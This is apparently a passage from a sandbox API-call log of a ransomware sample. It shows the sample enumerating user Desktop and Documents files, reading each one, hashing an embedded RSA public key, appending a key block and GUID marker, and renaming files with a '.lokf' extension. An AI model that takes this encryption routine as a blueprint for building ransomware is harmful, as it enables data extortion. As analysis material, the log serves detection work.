Uuid=0x9f4fa48) returned 0x0 [0058.765] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0058.765] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0058.765] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0058.765] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0058.765] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x32947b0 [0058.765] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xff99, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.765] WriteFile (in: hFile=0x5cc, lpBuffer=0x326a688*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326a688*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0058.766] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0058.766] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0058.766] CloseHandle (hObject=0x5cc) returned 1 [0058.767] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269658 [0058.767] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x880) returned 0x3268798 [0058.767] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\z_xjT1PbK9g5.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\z_xjt1pbk9g5.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\z_xjT1PbK9g5.mp3.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\z_xjt1pbk9g5.mp3.lokf")) returned 1 [0058.768] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x891324e0, ftCreationTime.dwHighDateTime=0x1d4c9af, ftLastAccessTime.dwLowDateTime=0x27cace10, ftLastAccessTime.dwHighDateTime=0x1d4d123, ftLastWriteTime.dwLowDateTime=0x27cace10, ftLastWriteTime.dwHighDateTime=0x1d4d123, nFileSizeHigh=0x0, nFileSizeLow=0xc043, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_FKxFEiW.m4a", cAlternateFileName="")) returned 1 [0058.768] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3261058 [0058.768] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x76) returned 0x3289860 [0058.768] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_FKxFEiW.m4a") returned=".m4a" [0058.768] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_FKxFEiW.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_fkxfeiw.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0058.768] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=49219) returned 1 [0058.768] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0058.770] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xc01d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.770] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0058.770] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0xc043, lpOverlapped=0x0) returned 1 [0058.771] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.771] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.771] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.771] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8a50) returned 1 [0058.772] CryptCreateHash (in: hProv=0x6b8a50, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0058.772] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0058.772] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0058.772] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0058.772] GetLastError () returned 0x0 [0058.772] CryptDestroyHash (hHash=0x327cb80) returned 1 [0058.772] CryptReleaseContext (hProv=0x6b8a50, dwFlags=0x0) returned 1 [0058.772] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0058.772] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0058.772] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0058.772] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0058.773] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xc043, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.773] WriteFile (in: hFile=0x5cc, lpBuffer=0x326a688*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326a688*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0058.773] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0058.773] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0058.773] CloseHandle (hObject=0x5cc) returned 1 [0058.774] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_FKxFEiW.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_fkxfeiw.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_FKxFEiW.m4a.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_fkxfeiw.m4a.lokf")) returned 1 [0058.775] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x891324e0, ftCreationTime.dwHighDateTime=0x1d4c9af, ftLastAccessTime.dwLowDateTime=0x27cace10, ftLastAccessTime.dwHighDateTime=0x1d4d123, ftLastWriteTime.dwLowDateTime=0x27cace10, ftLastWriteTime.dwHighDateTime=0x1d4d123, nFileSizeHigh=0x0, nFileSizeLow=0xc043, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_FKxFEiW.m4a", cAlternateFileName="")) returned 0 [0058.775] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0058.775] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32575c0 | out: hHeap=0x660000) returned 1 [0058.775] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32619a0 | out: hHeap=0x660000) returned 1 [0058.775] PeekMessageW (in: lpMsg=0x9f4ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4ff08) returned 0 [0058.775] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0058.775] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0058.775] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0058.775] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0058.775] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0058.775] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0058.775] PathFindFileNameW (pszPath="") returned="" [0058.775] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6ff2490, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x6ff2490, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0058.776] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329bcd8 | out: hHeap=0x660000) returned 1 [0058.776] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6ff2490, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x6ff2490, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.776] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c20130, ftCreationTime.dwHighDateTime=0x1d577a5, ftLastAccessTime.dwLowDateTime=0x93ba5690, ftLastAccessTime.dwHighDateTime=0x1d58578, ftLastWriteTime.dwLowDateTime=0x93ba5690, ftLastWriteTime.dwHighDateTime=0x1d58578, nFileSizeHigh=0x0, nFileSizeLow=0x15d50, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="-zw2kUwzHbrh6GhQEKb.pptx", cAlternateFileName="-ZW2KU~1.PPT")) returned 1 [0058.776] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-zw2kUwzHbrh6GhQEKb.pptx") returned=".pptx" [0058.776] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-zw2kUwzHbrh6GhQEKb.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\-zw2kuwzhbrh6ghqekb.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0058.776] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=89424) returned 1 [0058.776] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0058.778] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x15d2a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.778] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0058.779] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0058.779] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0058.779] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0058.779] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x15d50, lpOverlapped=0x0) returned 1 [0058.779] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.780] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0058.780] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.780] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.780] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8a50) returned 1 [0058.780] CryptCreateHash (in: hProv=0x6b8a50, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0058.780] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0058.780] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0058.780] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0058.780] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0058.780] GetLastError () returned 0x0 [0058.780] CryptDestroyHash (hHash=0x327cb80) returned 1 [0058.780] CryptReleaseContext (hProv=0x6b8a50, dwFlags=0x0) returned 1 [0058.781] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0058.781] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0058.781] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0058.781] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0058.781] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0058.781] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0058.781] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0058.781] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x15d50) returned 0x9c83710 [0058.781] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0058.781] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0058.781] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32995a0 [0058.781] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0058.781] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32afc78 [0058.781] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x32964a0 [0058.781] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c82968 [0058.781] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b118 [0058.781] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c829b0 [0058.781] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b130 [0058.781] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b160 [0058.781] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ad10 [0058.781] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b178 [0058.781] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x24) returned 0x32a08a0 [0058.781] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x158) returned 0x9c78728 [0058.781] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0058.781] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x32947b0 [0058.782] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b160 | out: hHeap=0x660000) returned 1 [0058.782] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b178 | out: hHeap=0x660000) returned 1 [0058.782] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ad10 | out: hHeap=0x660000) returned 1 [0058.782] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32a08a0 | out: hHeap=0x660000) returned 1 [0058.782] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0058.782] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ad10 [0058.782] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f60 [0058.782] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6b178 [0058.782] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x3242348 [0058.782] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x9) returned 0x9c6b160 [0058.782] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f10 [0058.782] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10e) returned 0x326a688 [0058.782] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e3b0 [0058.782] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x3296560 [0058.782] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242688 [0058.782] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x104) returned 0x32452d8 [0058.782] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x32425c8 [0058.782] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278ec0 [0058.782] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a688 | out: hHeap=0x660000) returned 1 [0058.782] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b178 | out: hHeap=0x660000) returned 1 [0058.782] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0058.782] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b160 | out: hHeap=0x660000) returned 1 [0058.782] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242348 | out: hHeap=0x660000) returned 1 [0058.782] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0058.782] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ad10 | out: hHeap=0x660000) returned 1 [0058.782] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0058.782] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32964a0 | out: hHeap=0x660000) returned 1 [0058.782] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c711f0 | out: hHeap=0x660000) returned 1 [0058.782] GetCurrentThreadId () returned 0x9e0 [0058.782] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326a688 [0058.782] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x82) returned 0x9c7cb18 [0058.782] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2c) returned 0x3257198 [0058.782] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8a50 [0058.782] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x148) returned 0x3201228 [0058.782] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f60 [0058.782] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f10 [0058.782] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x3234418 [0058.782] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0058.783] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0058.783] GetCurrentThreadId () returned 0x9e0 [0058.783] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0058.783] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0058.783] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xeb) returned 0x329e1f0 [0058.783] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0058.783] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0058.783] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0058.783] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0058.783] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329e1f0 | out: hHeap=0x660000) returned 1 [0058.783] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x3292fe8 [0058.783] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0058.783] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4c) returned 0x32619a0 [0058.783] 